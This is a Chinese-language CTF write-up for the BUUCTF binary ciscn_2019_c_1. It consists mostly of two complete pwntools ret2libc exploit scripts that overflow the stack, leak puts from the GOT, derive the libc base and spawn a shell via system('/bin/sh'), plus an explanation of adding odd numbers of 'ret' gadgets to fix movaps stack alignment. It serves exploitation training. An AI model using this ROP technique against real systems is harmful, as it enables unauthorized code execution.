下面是一位师傅的代码,文章跳转
from pwn import *
from LibcSearcher import *
# Two-stage ret2libc script for the BUUCTF training binary ciscn_2019_c_1:
# stage 1 leaks the runtime address of puts through the GOT and returns to
# main; stage 2 reuses the same overflow to call system("/bin/sh").
# Every address below is specific to this one binary build.
context.log_level='debug'  # echo every byte sent/received; handy while debugging the chain
r=process('./ciscn_2019_c_1')  # local run; no remote target is used in this script
elf = ELF('./ciscn_2019_c_1')
ret = 0x4006b9           # bare `ret` gadget, used only to re-align rsp (see stage 2)
pop_rdi_addr = 0x400c83  # `pop rdi ; ret` gadget: loads the first call argument
puts_plt = elf.plt["puts"]    # call target for the leak
puts_got = elf.got["puts"]    # GOT slot whose contents are printed
main_addr = elf.sym["main"]   # return here so the program accepts a second input
r.sendlineafter(b"Input your choice!\n",b'1')
# Stage 1: one prefix byte + 0x57 filler, then puts(puts_got) and back to main.
payload = b'\x00'+b'a'*0x57+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil(b"encrypted\n")
r.sendline(payload)
r.recvuntil(b"Ciphertext\n")
#
r.recvuntil(b"\n")  # presumably skips the echoed ciphertext line; the leak follows — verify against the program output
#
# The leaked pointer is printed as raw bytes (fewer than 8, no NULs); drop the
# trailing newline and zero-pad to 8 bytes before unpacking as a 64-bit value.
puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
# Resolve the libc build from the leaked puts address and derive the base.
# NOTE(review): LibcSearcher may report several candidate builds; with the
# wrong one the offsets below are off and stage 2 fails silently.
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")
r.sendlineafter(b"Input your choice!\n",b'1')
# Stage 2: same filler, then one extra `ret` so rsp is 16-byte aligned when
# system() executes its `movaps` (otherwise it raises #GP — see the note in the
# article), followed by system("/bin/sh").
payload1 = b'\x00'+b'a'*0x57+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)
r.recvuntil(b"encrypted\n")
r.sendline(payload1)
r.interactive()
关于为什么加上p64(ret),经过我调试发现是如下汇编代码出现问题。
=> 0x7ffff7a332f6 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
movaps 指令在源操作数或目标操作数为内存操作数时,要求该操作数必须在 16 字节边界上对齐,否则会产生一般保护异常 (#GP)。一条 ret 指令会使 rsp 增加 8,故在 ROP 链中加上一个 p64(ret) 是为了让 rsp 重新变为 16 字节对齐。
所以加上奇数个 p64(ret) 也可以(偶数个会把 rsp 移回原来的未对齐状态),比如下面我加了三个 p64(ret)。
from pwn import *
from LibcSearcher import *
# Same two-stage ret2libc script as above; the only difference is that stage 2
# uses three `ret` gadgets instead of one (any odd count keeps rsp aligned).
context.log_level='debug'  # echo every byte sent/received while debugging
# r = remote('node4.buuoj.cn',29156)
r=process('./ciscn_2019_c_1')  # local run; the remote line above is left disabled
elf = ELF('./ciscn_2019_c_1')
ret = 0x4006b9           # bare `ret` gadget, used only to re-align rsp
pop_rdi_addr = 0x400c83  # `pop rdi ; ret` gadget: loads the first call argument
puts_plt = elf.plt["puts"]    # call target for the leak
puts_got = elf.got["puts"]    # GOT slot whose contents are printed
main_addr = elf.sym["main"]   # return here so the program accepts a second input
r.sendlineafter(b"Input your choice!\n",b'1')
# Stage 1: one prefix byte + 0x57 filler, then puts(puts_got) and back to main.
payload = b'\x00'+b'a'*0x57+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
r.recvuntil(b"encrypted\n")
r.sendline(payload)
r.recvuntil(b"Ciphertext\n")
#
r.recvuntil(b"\n")  # presumably skips the echoed ciphertext line; the leak follows — verify against the program output
#
# Leaked pointer arrives as raw bytes; strip the newline and zero-pad to 8.
puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
# NOTE(review): LibcSearcher may report several candidate builds; with the
# wrong one the offsets below are off and stage 2 fails silently.
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base+libc.dump("system")
bin_sh = libc_base+libc.dump("str_bin_sh")
r.sendlineafter(b"Input your choice!\n",b'1')
#
# Stage 2: three `ret` gadgets (each moves rsp by 8, so an odd number flips the
# alignment exactly as one does) before system("/bin/sh"); this keeps rsp
# 16-byte aligned at the `movaps` inside system().
payload1 = b'\x00'+b'a'*0x57+p64(ret)+p64(ret)+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)
#
r.recvuntil(b"encrypted\n")
r.sendline(payload1)
r.interactive()
总结:若 system 打不通,且 gdb 调试时卡在了 movaps 处,可以尝试在 ROP 链中添加一个 "ret" gadget 使 rsp 对齐。
代码参考:
BUUCTF ciscn_2019_c_1_Loτυs的博客-CSDN博客
原理参考:
如有误解,请批评指正